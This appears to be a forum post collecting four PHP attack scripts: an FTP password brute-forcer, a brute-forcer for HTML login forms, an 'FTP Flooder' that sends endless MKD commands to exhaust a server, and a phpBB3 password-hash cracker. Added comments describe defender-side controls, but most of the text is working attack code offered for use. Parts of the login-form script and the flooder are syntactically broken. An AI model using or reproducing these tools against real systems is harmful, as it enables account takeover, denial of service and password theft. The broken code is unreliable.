Simple FTP Brute-Force

Код:
<?php 
// Single-account FTP password guessing from a wordlist.
// Takes three command-line arguments (host, username, wordlist path), opens one
// FTP control connection and calls ftp_login() once per wordlist line, stopping
// at the first attempt the server accepts.
//
// Defender view: every rejected attempt is a failed login for the same username
// over the same control connection, so the server log shows a dense run of
// failures from one source. Capping failed logins per connection and per source
// address, adding lockout/backoff on the account, and alerting on such bursts
// are the relevant controls. ftp_connect() speaks plain FTP, so credentials sent
// this way are also visible on the wire; prefer SFTP/FTPS with key-based auth.
$sito = $argv[1]; 
$username = $argv[2]; 
$lista = $argv[3]; 
  
// Proceed only when all three arguments are set; otherwise print the usage text.
if((isset($sito)) AND (isset($lista)) AND (isset($username))){ 
  
if (file_exists($lista)){ 
  
// Load the wordlist into an array, one element per line.
$lista = file($lista); 
$connessione = ftp_connect($sito) or die("Impossibile stabilire una connessione a $sito"); 
  
foreach($lista as $passwd){ 
  
// '@' suppresses the warning PHP raises when the login is rejected.
if(@ftp_login($connessione, $username, $passwd)){ 
die("\t[Successo] - $passwd"); 
} else { 
print "[Fallito] - $passwd\n"; 
} 
  
} 
  
// Reached only when no candidate was accepted.
ftp_close($connessione); 
} else 
die("Lista per il brute force assente"); 
  
} else 
die("Uso: php <file>.php <sito> <username> <list>\nEsempio: php brute.php ftp.google.it admin /root/list.txt"); 
?>

cURL Bruteforcer Password

Код:
<?php 
// Online password guessing against an HTML login form over HTTP POST.
// A response is treated as a successful login when it does NOT contain the
// failure message configured in $bad.
//
// Defender view: the traffic is a stream of POSTs to one login endpoint for one
// username from one client. Per-account and per-source throttling, lockout or
// backoff after repeated failures, MFA, and alerting on high-rate failed logins
// are the controls that address it.

// configure the bruter with your scenario 
$target = "http://www.httpscript.com/login.php"; // your target. 
$user = "admin"; // the user we are bruting 
$user_field = "user_name"; // the username field name in form 
$pass_field = "password"; // the password field name in form 
$bad = "Wrong username or password"; // message if the user / pass was wrong 
$list = "path_to_word_list"; // the path to your wordlist 


// Set the time limit of executing the script to 0 - never 
set_time_limit(0); 

// Start the normal cURL routine: one reusable handle, response returned as a
// string, redirects followed, request method POST.
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $target); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
curl_setopt($ch, CURLOPT_POST, 1); 

// The actual bruting process: one POST per wordlist line.
foreach(file($list) as $line) 
{ 
$word = str_replace(array(" 
", " 
"), , $line); 
$postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; 
curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); 
$res = curl_exec($ch); 
// Success is inferred from the absence of the failure message in the body.
if(!eregi($bad,$res)) 
{ 
die("Pass found, it is: {$word}"); // password found 
} 

} 

// close cURL connection 
curl_close($ch); 

?>

FTP Flooder

Код:
<?php 
############################################### 
#owned your ennemies. 
############################################### 
# Removes PHP's execution time limit, so the endless loop at the end of this
# script is not stopped by the runtime.
set_time_limit(0); ## << We NEED that. 

    /**
     * Send one command line on the control connection and trace it as HTML.
     *
     * The trace line is echoed first, then the command is written to the
     * stream followed by a single "\n".
     *
     * NOTE(review): $out is placed into the HTML trace without escaping.
     *
     * @param resource $conn Open stream to write to.
     * @param string   $out  Command text, without line terminator.
     */
    function swrite($conn,$out){
        $trace = "<font color='blue'> < " . $out . " </font><br>";
        print $trace;
        fwrite($conn, $out . "\n");
    }
    /**
     * Read one line from the control connection and trace it as HTML.
     *
     * An empty or failed read is traced in red as "No Responce"; anything else
     * is traced in green. The raw fgets() result is returned either way, so the
     * caller receives false when nothing could be read.
     *
     * NOTE(review): the server's reply is echoed into HTML without escaping.
     *
     * @param resource $conn Open stream to read from.
     * @return string|false The line as returned by fgets().
     */
    function sreadline($conn){
        $reply = fgets($conn);
        $markup = ($reply == '')
            ? "<font color='red'> > No Responce </font><br>"
            : "<font color='green'> > " . $reply . " </font><br>";
        echo $markup;
        return $reply;
    }
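    /**
     * Read lines from the stream until fgets() yields nothing, and return
     * everything read as one string.
     *
     * The accumulator is initialised explicitly; the earlier version appended
     * to an undefined variable, which raises a warning on every call.
     *
     * @param resource $conn Open stream to read from.
     * @return string Concatenation of all lines read ('' when there were none).
     */
    function sread($conn){
        $s = '';
        // Loose comparison on purpose: fgets() returns false at end of stream.
        while (($line = fgets($conn)) != '') {
            $s .= $line;
        }
        return $s;
    }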
     
    # Resource-exhaustion loop against an FTP server: log in (anonymous by
    # default), then send MKD with an incrementing suffix forever.
    #
    # Defender view: the effect is unbounded directory creation by one session.
    # Relevant controls are denying MKD/write to anonymous users, per-user disk
    # and inode quotas on upload areas, per-session command rate limits, and
    # alerting on sustained MKD traffic from a single session.
    $host = 'localhost'; 
    $user = 'anonymous'; 
    $pass = 'blablabla'
     
# Connect. 
    # Control connection to port 21 with a 30-second connect timeout.
    $control = fsockopen($host,21,$errno,$errstr,30); 
    if(!$control) 
        die("ERROR: $errno ($errstr) "); 
    sreadline($control); 
     
# Login. 
    swrite($control, "USER $user"); 
    sreadline($control); 
    swrite($control, "PASS $pass"); 
    # Split the reply into its code and the remaining text.
    $message = explode(' ',sreadline($control),2); 

    # 530 means the server rejected the login; stop silently.
    if( $message[0] == 530 ) 
        die(); 
         
# Enter Type A 
    swrite($control, "TYPE A"); 
    sreadline($control); 
     
# Passive Mode FTW 
    # The PASV reply is not read here; the next sreadline() call picks it up.
    swrite($control, "PASV"); 

$x = 1; 
# No exit condition: runs until the process or the connection is killed.
while(1) 
{ 
     swrite($control,"MKD /upload/DaaaaarkMiiiiiiiiiiiiiiiiindZ". $x ." "); ## make sure you write to a writeable dir... 
     sreadline($control); 

$x++; 
} 
# kthxbai! 
?>

PhpBB3 Hash Bruteforce

Код:
#!/usr/bin/php  
<?php  
// No execution time limit: the exhaustive search below can run for a long time.
set_time_limit(0);  
   
echo "///////////////////////////////////////////////\r\n";  
echo "//         PHPBB3 Bruteforce             //\r\n";  
echo "//  Original bruteforce script by Tux      //\r\n";  
echo "//     Moded for Phpbb3 by Jeforce     //\r\n";  
echo "//     http://www.jeforce.net            //\r\n";  
echo "////////////////////////////////////////////\r\n";  
   
// Print the usage text and exit when no argument is given or --help is asked for.
if ($argc<2 || $argv[1]=='--help') {  
    echo<<<END  
USAGE: {$argv[0]} 'hash' chars  
    - hash        : The hash to crack  
    - chars        : Max length string to attempt to crack  
   
HELP: {$argv[0]} --help  
   
   
END;  
    exit;  
}  
//Fonction PHPBB3  
   
/**
 * Compute the phpBB3 portable ('$H$') hash of a password.
 *
 * Cost and salt come from $setting, an existing hash string: the character at
 * offset 3 is looked up in $itoa64 to give log2 of the iteration count, and
 * the 8 characters from offset 4 are the salt. The digest is raw MD5 of
 * (salt . password), then re-hashed as MD5(digest . password) 2^cost times.
 *
 * @param string $password Password to hash.
 * @param string $setting  Existing hash supplying prefix, cost and salt.
 * @param string $itoa64   64-character encoding alphabet (by reference).
 * @return string First 12 characters of $setting followed by the encoded
 *                digest, or '*' when $setting is not a usable '$H$' hash.
 */
function _hash_crypt_private($password, $setting, &$itoa64)
{
    // Only the '$H$' scheme is handled.
    if (substr($setting, 0, 3) != '$H$') {
        return '*';
    }

    // strpos() yields false for a character outside the alphabet; false fails
    // the range test below just like an out-of-range cost does.
    $costLog2 = strpos($itoa64, $setting[3]);
    if (!($costLog2 >= 7 && $costLog2 <= 30)) {
        return '*';
    }

    $salt = substr($setting, 4, 8);
    if (strlen($salt) != 8) {
        return '*';
    }

    // md5(..., true) returns the raw 16-byte digest.
    $digest = md5($salt . $password, true);
    for ($rounds = 1 << $costLog2; $rounds > 0; $rounds--) {
        $digest = md5($digest . $password, true);
    }

    return substr($setting, 0, 12) . _hash_encode64($digest, 16, $itoa64);
}
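/**
 * Build the setting prefix ('$H$' + cost character + encoded salt) for a new
 * portable hash.
 *
 * @param string $input                Random bytes for the salt; the first 6
 *                                     are encoded.
 * @param string $itoa64               64-character encoding alphabet (by reference).
 * @param int    $iteration_count_log2 Requested cost; values outside 4..31 are
 *                                     replaced by 8.
 * @return string The setting string to pass to _hash_crypt_private().
 */
function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)
{
    if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) {
        $iteration_count_log2 = 8;
    }

    // Compare the integer major version. The earlier `PHP_VERSION >= 5` compared
    // a version string with an int, which stops being reliable once the major
    // version has two digits.
    $bonus = (PHP_MAJOR_VERSION >= 5) ? 5 : 3;

    $output = '$H$';
    // The stored cost is capped at 30.
    $output .= $itoa64[min($iteration_count_log2 + $bonus, 30)];
    $output .= _hash_encode64($input, 6, $itoa64);
    return $output;
}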
   
/**
 * Encode the first $count bytes of $input with the 64-character alphabet.
 *
 * Bytes are consumed in groups of up to three, packed little-endian into one
 * integer, and emitted as 6-bit symbols, lowest bits first. A final group of
 * one byte yields two symbols, of two bytes three symbols, of three bytes four.
 *
 * @param string $input  Binary string to encode.
 * @param int    $count  Number of leading bytes of $input to encode.
 * @param string $itoa64 64-character encoding alphabet (by reference).
 * @return string The encoded text.
 */
function _hash_encode64($input, $count, &$itoa64)
{
    $encoded = '';
    $pos = 0;

    do {
        // First byte of the group: low 6 bits.
        $bits = ord($input[$pos]);
        $pos++;
        $encoded .= $itoa64[$bits & 0x3f];

        // Second byte, if any, supplies bits 8..15.
        if ($pos < $count) {
            $bits |= ord($input[$pos]) << 8;
        }
        $encoded .= $itoa64[($bits >> 6) & 0x3f];

        $pos++;
        if ($pos - 1 >= $count) {
            break;
        }

        // Third byte, if any, supplies bits 16..23.
        if ($pos < $count) {
            $bits |= ord($input[$pos]) << 16;
        }
        $encoded .= $itoa64[($bits >> 12) & 0x3f];

        $pos++;
        if ($pos - 1 >= $count) {
            break;
        }

        $encoded .= $itoa64[($bits >> 18) & 0x3f];
    } while ($pos < $count);

    return $encoded;
}
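/**
 * Check a password against a stored phpBB hash.
 *
 * A 34-character hash is treated as a portable '$H$' hash and recomputed with
 * _hash_crypt_private(); any other length is compared against plain md5().
 * Comparisons use hash_equals() so the time taken does not depend on how many
 * leading characters match.
 *
 * @param string $password Candidate password.
 * @param string $hash     Stored hash.
 * @return bool True when the password matches the hash.
 */
function phpbb_check_hash($password, $hash)
{
    $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

    // hash_equals() needs strings; a non-string hash can never match.
    if (!is_string($hash)) {
        return false;
    }

    if (strlen($hash) == 34) {
        return hash_equals($hash, _hash_crypt_private($password, $hash, $itoa64));
    }

    // NOTE(review): legacy fallback to unsalted MD5. Hashes stored in this form
    // offer little resistance once leaked; new hashes are better created with
    // password_hash() and checked with password_verify().
    return hash_equals($hash, md5($password));
}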
   
//if(isset($argv[4])) $charset=$argv[4];  
//else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';  
   
// Offline exhaustive search: enumerates every string of length 1..$SIZE over
// the 62-character alphabet below and tests each with phpbb_check_hash().
//
// Defender view: this needs only a leaked hash and never contacts the server,
// so login throttling does not apply. Resistance comes from the cost of the
// hash function and from password length: each extra character multiplies the
// keyspace by 62. Protecting the hash table and using a slow, salted password
// hash are the relevant controls.
$charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';  
$charset_beginning = $charset{0};  
$charset_end = $charset{strlen($charset)-1};  
   
//$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';  
// $SIZE = (int) $_GET['chars'];  
$HASH = $argv[1];  
$SIZE = (int) $argv[2];  
   
// Start one second in the past so the rate computation never divides by zero.
$start = time()-1;  
$curtotal=0;  
$total=0;  
// Total keyspace: the sum of charset_length^i for i = 1..$SIZE.
for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);  
// Interval, in candidates, between progress lines.
$split=ceil(($total/strlen($charset))/5);  
   
   
echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";  
echo " *** TOTAL KEYS: $total\r\n";  
echo " *** CHARSET: $charset\r\n";  
   
// One pass per candidate length, shortest first.
for($i=1; $i<=$SIZE; $i++) {  
    $keyspace = pow(strlen($charset), $i);  
    echo "\r\nAttempting to crack with $i characters.\r\n";  
    echo " *** Total combinations: $keyspace\r\n";  
   
    // The first candidate of this length is the first charset character repeated.
    $key = '';  
    for ($y=0; $y<$i; $y++) $key .= $charset_beginning;  
   
    for ($x=0; $x<$keyspace+1; $x++) {  
        $curtotal++;  
   
        if (phpbb_check_hash($key, $HASH)) {  
            $time=(time()-$start);  
            echo<<<END  
   
Successfully key cracked after $time seconds. The cracker searched a total  
of $curtotal keys out of a possible $total in $time seconds.  
   
Found the clear text of '$HASH' is '$key'.\n  
END;  
            exit;  
        }  
   
        // Periodic progress line with the average rate so far.
        if($x%$split == 0) {  
            $rate=ceil($curtotal/(time()-$start));  
            echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";  
        }  
   
        // Advance $key like an odometer: bump the first position that is not at
        // the last charset character and reset every position before it.
        for ($y=0; $y<$i; $y++) {  
            if ($key[$y] != $charset_end) {  
                $key[$y] = $charset{strpos($charset, $key[$y])+1};  
   
                if ($y > 0)  for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;  
                break;  
            }  
        }  
    }  
}  
// Reached only when every candidate up to $SIZE characters has been tried.
$time=time()-$start;  
echo<<<END  
*** SORRY NO MATCHS FOUND  
    Time running : $time. Keys searched : $total.\n  
END;  
?>